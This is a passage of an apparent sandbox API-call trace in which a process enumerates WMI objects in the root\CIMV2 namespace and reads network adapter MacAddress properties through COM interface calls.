IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e364 | out: ppvObject=0xf2e364*=0x126b49c) returned 0x0 [0065.234] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e394 | out: pAptType=0xf2e394*=3) returned 0x0 [0065.234] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.234] WbemLocator:IUnknown:QueryInterface (in: This=0x12b5240, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e354 | out: ppvObject=0xf2e354*=0x12b519c) returned 0x0 [0065.234] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x12b519c, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e35c | out: pCid=0xf2e35c*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0065.234] WbemLocator:IUnknown:Release (This=0x12b519c) returned 0x3 [0065.235] CoGetContextToken (in: pToken=0xf2e364 | out: pToken=0xf2e364) returned 0x0 [0065.235] WbemLocator:IUnknown:AddRef (This=0x12b5240) returned 0x4 [0065.235] WbemLocator:IUnknown:QueryInterface (in: This=0x12b5240, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e3d8 | out: ppvObject=0xf2e3d8*=0x12b5224) returned 0x0 [0065.235] WbemLocator:IUnknown:Release (This=0x12b5240) returned 0x4 [0065.235] WbemLocator:IRpcOptions:Query (in: This=0x12b5224, pPrx=0x12b5240, dwProperty=2, pdwValue=0xf2e3fc | out: pdwValue=0xf2e3fc) returned 0x80004002 [0065.235] WbemLocator:IUnknown:Release (This=0x12b5224) returned 0x3 [0065.235] WbemLocator:IUnknown:Release (This=0x12b5240) returned 0x2 [0065.235] CoGetContextToken (in: pToken=0xf2e7d8 | out: pToken=0xf2e7d8) returned 0x0 [0065.235] CoGetContextToken (in: pToken=0xf2e798 | out: pToken=0xf2e798) returned 0x0 [0065.235] WbemLocator:IUnknown:AddRef (This=0x12b5240) returned 0x3 [0065.235] WbemLocator:IUnknown:QueryInterface (in: This=0x12b5240, riid=0xf2e814*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2e810 | out: ppvObject=0xf2e810*=0x12b85b8) returned 0x0 [0065.235] WbemLocator:IUnknown:Release (This=0x12b5240) returned 0x3 [0065.235] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.235] IUnknown:Release (This=0x12b85b8) returned 0x1 [0065.235] SysStringLen (param_1=0x0) returned 0x0 [0065.235] GetLastError () returned 0x0 [0065.235] CoGetContextToken (in: pToken=0xf2edcc | out: pToken=0xf2edcc) returned 0x0 [0065.236] CoGetContextToken (in: pToken=0xf2ed8c | out: pToken=0xf2ed8c) returned 0x0 [0065.236] WbemLocator:IUnknown:AddRef (This=0x12b5240) returned 0x2 [0065.236] WbemLocator:IUnknown:QueryInterface (in: This=0x12b5240, riid=0xf2ee08*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0xf2ee04 | out: ppvObject=0xf2ee04*=0x12b85b8) returned 0x0 [0065.236] WbemLocator:IUnknown:Release (This=0x12b5240) returned 0x2 [0065.236] IUnknown:AddRef (This=0x12b85b8) returned 0x3 [0065.236] IEnumWbemClassObject:Reset (This=0x12b85b8) returned 0x0 [0065.236] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.236] CoGetContextToken (in: pToken=0xf2ecbc | out: pToken=0xf2ecbc) returned 0x0 [0065.236] IUnknown:AddRef (This=0x12b85b8) returned 0x3 [0065.236] IEnumWbemClassObject:Next (in: This=0x12b85b8, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x327a99c | out: apObjects=0x1271d78*=0x12b2170, puReturned=0x327a99c*=0x1) returned 0x0 [0065.316] IUnknown:QueryInterface (in: This=0x12b2170, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2c8 | out: ppvObject=0xf2e2c8*=0x12b2170) returned 0x0 [0065.316] IUnknown:QueryInterface (in: This=0x12b2170, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e284 | out: ppvObject=0xf2e284*=0x0) returned 0x80004002 [0065.316] IUnknown:QueryInterface (in: This=0x12b2170, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e178 | out: ppvObject=0xf2e178*=0x0) returned 0x80004002 [0065.316] IUnknown:AddRef (This=0x12b2170) returned 0x3 [0065.316] CoGetContextToken (in: pToken=0xf2e110 | out: pToken=0xf2e110) returned 0x0 [0065.316] CoGetContextToken (in: pToken=0xf2e0d4 | out: pToken=0xf2e0d4) returned 0x0 [0065.316] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e108 | out: ppvObject=0xf2e108*=0x126b49c) returned 0x0 [0065.316] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e138 | out: pAptType=0xf2e138*=3) returned 0x0 [0065.317] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.317] IUnknown:QueryInterface (in: This=0x12b2170, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0f8 | out: ppvObject=0xf2e0f8*=0x12b2174) returned 0x0 [0065.317] IMarshal:GetUnmarshalClass (in: This=0x12b2174, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e100 | out: pCid=0xf2e100*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0065.317] IUnknown:Release (This=0x12b2174) returned 0x3 [0065.317] CoGetContextToken (in: pToken=0xf2e108 | out: pToken=0xf2e108) returned 0x0 [0065.317] IUnknown:AddRef (This=0x12b2170) returned 0x4 [0065.317] IUnknown:QueryInterface (in: This=0x12b2170, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e17c | out: ppvObject=0xf2e17c*=0x0) returned 0x80004002 [0065.317] IUnknown:Release (This=0x12b2170) returned 0x3 [0065.317] IUnknown:Release (This=0x12b2170) returned 0x2 [0065.317] CoGetContextToken (in: pToken=0xf2e568 | out: pToken=0xf2e568) returned 0x0 [0065.317] CoGetContextToken (in: pToken=0xf2e528 | out: pToken=0xf2e528) returned 0x0 [0065.317] IUnknown:AddRef (This=0x12b2170) returned 0x3 [0065.318] IUnknown:QueryInterface (in: This=0x12b2170, riid=0xf2e5a4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xf2e5a0 | out: ppvObject=0xf2e5a0*=0x12b2170) returned 0x0 [0065.318] IUnknown:Release (This=0x12b2170) returned 0x3 [0065.318] IUnknown:Release (This=0x12b2170) returned 0x2 [0065.318] IUnknown:Release (This=0x12b2170) returned 0x1 [0065.318] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.318] CoGetContextToken (in: pToken=0xf2ee50 | out: pToken=0xf2ee50) returned 0x0 [0065.318] IUnknown:AddRef (This=0x12b2170) returned 0x2 [0065.318] IWbemClassObject:Get (in: This=0x12b2170, wszName="__GENUS", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef80*=0, plFlavor=0xf2ef7c*=0 | out: pVal=0xf2eecc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xf2ef80*=3, plFlavor=0xf2ef7c*=64) returned 0x0 [0065.318] IWbemClassObject:Get (in: This=0x12b2170, wszName="__PATH", lFlags=0, pVal=0xf2eeac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=0, plFlavor=0xf2ef60*=0 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.319] IWbemClassObject:Get (in: This=0x12b2170, wszName="__RELPATH", lFlags=0, pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.319] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.319] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.319] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.319] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x12b3f50) returned 0x0 [0065.319] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.319] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef38 | out: puCount=0xf2ef38*=0x2) returned 0x0 [0065.319] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.319] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.319] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.319] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.319] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.319] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.320] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef34*=0x15, pszText=0x0) returned 0x0 [0065.320] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.320] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.320] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.320] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.320] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.320] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.320] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef34*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.320] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.320] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.320] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.320] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.320] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x12b3f50) returned 0x0 [0065.320] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.320] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef0c | out: puCount=0xf2ef0c*=0x2) returned 0x0 [0065.321] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.321] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.321] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.321] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.321] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.321] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef08*=0x15, pszText=0x0) returned 0x0 [0065.321] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.321] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.321] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.321] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.321] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed80 | out: ppvObject=0xf2ed80*=0x12b3f50) returned 0x0 [0065.321] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.321] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef08*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef08*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.321] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.321] IWbemClassObject:Get (in: This=0x12b2170, wszName="MacAddress", lFlags=0, pVal=0xf2eec8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327ad70*=0, plFlavor=0x327ad74*=0 | out: pVal=0xf2eec8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327ad70*=8, plFlavor=0x327ad74*=32) returned 0x0 [0065.321] IWbemClassObject:Get (in: This=0x12b2170, wszName="MacAddress", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327ad70*=8, plFlavor=0x327ad74*=32 | out: pVal=0xf2eecc*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x327ad70*=8, plFlavor=0x327ad74*=32) returned 0x0 [0065.322] CoGetContextToken (in: pToken=0xf2ecbc | out: pToken=0xf2ecbc) returned 0x0 [0065.322] IUnknown:AddRef (This=0x12b85b8) returned 0x3 [0065.322] IEnumWbemClassObject:Next (in: This=0x12b85b8, lTimeout=-1, uCount=0x1, apObjects=0x1271d78, puReturned=0x327a99c | out: apObjects=0x1271d78*=0x12b27d0, puReturned=0x327a99c*=0x1) returned 0x0 [0065.325] IUnknown:QueryInterface (in: This=0x12b27d0, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e2c8 | out: ppvObject=0xf2e2c8*=0x12b27d0) returned 0x0 [0065.325] IUnknown:QueryInterface (in: This=0x12b27d0, riid=0x7438a6d0*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xf2e284 | out: ppvObject=0xf2e284*=0x0) returned 0x80004002 [0065.325] IUnknown:QueryInterface (in: This=0x12b27d0, riid=0x7431e9fc*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xf2e178 | out: ppvObject=0xf2e178*=0x0) returned 0x80004002 [0065.325] IUnknown:AddRef (This=0x12b27d0) returned 0x3 [0065.325] CoGetContextToken (in: pToken=0xf2e110 | out: pToken=0xf2e110) returned 0x0 [0065.325] CoGetContextToken (in: pToken=0xf2e0d4 | out: pToken=0xf2e0d4) returned 0x0 [0065.325] IUnknown:QueryInterface (in: This=0x126b490, riid=0x74384a28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e108 | out: ppvObject=0xf2e108*=0x126b49c) returned 0x0 [0065.325] IComThreadingInfo:GetCurrentApartmentType (in: This=0x126b49c, pAptType=0xf2e138 | out: pAptType=0xf2e138*=3) returned 0x0 [0065.325] IUnknown:Release (This=0x126b49c) returned 0x1 [0065.325] IUnknown:QueryInterface (in: This=0x12b27d0, riid=0x7429b034*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e0f8 | out: ppvObject=0xf2e0f8*=0x12b27d4) returned 0x0 [0065.325] IMarshal:GetUnmarshalClass (in: This=0x12b27d4, riid=0x743703ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xf2e100 | out: pCid=0xf2e100*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0065.325] IUnknown:Release (This=0x12b27d4) returned 0x3 [0065.326] CoGetContextToken (in: pToken=0xf2e108 | out: pToken=0xf2e108) returned 0x0 [0065.326] IUnknown:AddRef (This=0x12b27d0) returned 0x4 [0065.326] IUnknown:QueryInterface (in: This=0x12b27d0, riid=0x743254dc*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xf2e17c | out: ppvObject=0xf2e17c*=0x0) returned 0x80004002 [0065.326] IUnknown:Release (This=0x12b27d0) returned 0x3 [0065.326] IUnknown:Release (This=0x12b27d0) returned 0x2 [0065.326] CoGetContextToken (in: pToken=0xf2e568 | out: pToken=0xf2e568) returned 0x0 [0065.326] CoGetContextToken (in: pToken=0xf2e528 | out: pToken=0xf2e528) returned 0x0 [0065.326] IUnknown:AddRef (This=0x12b27d0) returned 0x3 [0065.326] IUnknown:QueryInterface (in: This=0x12b27d0, riid=0xf2e5a4*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xf2e5a0 | out: ppvObject=0xf2e5a0*=0x12b27d0) returned 0x0 [0065.326] IUnknown:Release (This=0x12b27d0) returned 0x3 [0065.326] IUnknown:Release (This=0x12b27d0) returned 0x2 [0065.326] IUnknown:Release (This=0x12b27d0) returned 0x1 [0065.326] IUnknown:Release (This=0x12b85b8) returned 0x2 [0065.326] CoGetContextToken (in: pToken=0xf2ee50 | out: pToken=0xf2ee50) returned 0x0 [0065.326] IUnknown:AddRef (This=0x12b27d0) returned 0x2 [0065.326] IWbemClassObject:Get (in: This=0x12b27d0, wszName="__GENUS", lFlags=0, pVal=0xf2eecc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef80*=0, plFlavor=0xf2ef7c*=0 | out: pVal=0xf2eecc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xf2ef80*=3, plFlavor=0xf2ef7c*=64) returned 0x0 [0065.327] IWbemClassObject:Get (in: This=0x12b27d0, wszName="__PATH", lFlags=0, pVal=0xf2eeac*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=0, plFlavor=0xf2ef60*=0 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.327] IWbemClassObject:Get (in: This=0x12b27d0, wszName="__RELPATH", lFlags=0, pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64 | out: pVal=0xf2eeac*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xf2ef64*=8, plFlavor=0xf2ef60*=64) returned 0x0 [0065.327] CoGetContextToken (in: pToken=0xf2ed84 | out: pToken=0xf2ed84) returned 0x0 [0065.327] CoGetContextToken (in: pToken=0xf2ed44 | out: pToken=0xf2ed44) returned 0x0 [0065.327] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.327] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edc0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edbc | out: ppvObject=0xf2edbc*=0x12b3f50) returned 0x0 [0065.327] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.327] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef38 | out: puCount=0xf2ef38*=0x2) returned 0x0 [0065.327] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.327] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.327] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.327] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.327] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.327] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.327] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x0, pszText=0x0 | out: puBuffLength=0xf2ef34*=0x15, pszText=0x0) returned 0x0 [0065.328] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.328] CoGetContextToken (in: pToken=0xf2ed74 | out: pToken=0xf2ed74) returned 0x0 [0065.328] CoGetContextToken (in: pToken=0xf2ed34 | out: pToken=0xf2ed34) returned 0x0 [0065.328] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.328] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2edb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2edac | out: ppvObject=0xf2edac*=0x12b3f50) returned 0x0 [0065.329] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.329] WbemDefPath:IWbemPath:GetText (in: This=0x12b3f50, lFlags=4, puBuffLength=0xf2ef34*=0x15, pszText="00000000000000000000" | out: puBuffLength=0xf2ef34*=0x15, pszText="\\\\LHNIWSJ\\root\\CIMV2") returned 0x0 [0065.329] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.329] CoGetContextToken (in: pToken=0xf2ed58 | out: pToken=0xf2ed58) returned 0x0 [0065.329] CoGetContextToken (in: pToken=0xf2ed18 | out: pToken=0xf2ed18) returned 0x0 [0065.329] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, riid=0xf2ed94*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xf2ed90 | out: ppvObject=0xf2ed90*=0x12b3f50) returned 0x0 [0065.329] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x3 [0065.329] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x12b3f50, puCount=0xf2ef0c | out: puCount=0xf2ef0c*=0x2) returned 0x0 [0065.329] WbemDefPath:IUnknown:Release (This=0x12b3f50) returned 0x2 [0065.329] CoGetContextToken (in: pToken=0xf2ed48 | out: pToken=0xf2ed48) returned 0x0 [0065.329] CoGetContextToken (in: pToken=0xf2ed08 | out: pToken=0xf2ed08) returned 0x0 [0065.329] WbemDefPath:IUnknown:AddRef (This=0x12b3f50) returned 0x3 [0065.329] WbemDefPath:IUnknown:QueryInterface (in: This=0x12b3f50, 